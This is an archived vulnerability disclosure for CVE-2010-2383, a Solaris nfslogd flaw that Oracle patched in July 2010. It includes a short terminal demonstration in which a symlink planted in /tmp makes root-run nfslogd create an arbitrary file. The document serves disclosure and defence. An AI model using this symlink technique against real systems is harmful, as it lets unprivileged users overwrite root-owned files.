SECURITYVULNS:DOC:24287
Jul 20, 2010 - 12:00 a.m.

CVE-2010-2383: Solaris nfslogd unsafe use of temporary files

Below is the full disclosure information for CVE-2010-2383. It was
reported to [email protected] on 29 December, 2009 and assigned Sun
bug 6913655.

This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).


This one is with nfslogd which allows an unprivileged
user to create/overwrite a file as root:

Don't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx 1 nobody nobody 9 Dec 29 21:24 /tmp/.nfslogd.pid -> /etc/oops
Don't Panic! # id
uid=0(root) gid=0(root)
Don't Panic! # /usr/lib/nfs/nfslogd
Don't Panic! # ls -dl /etc/oops
-rw------- 1 root root 4 Dec 29 21:25 /etc/oops

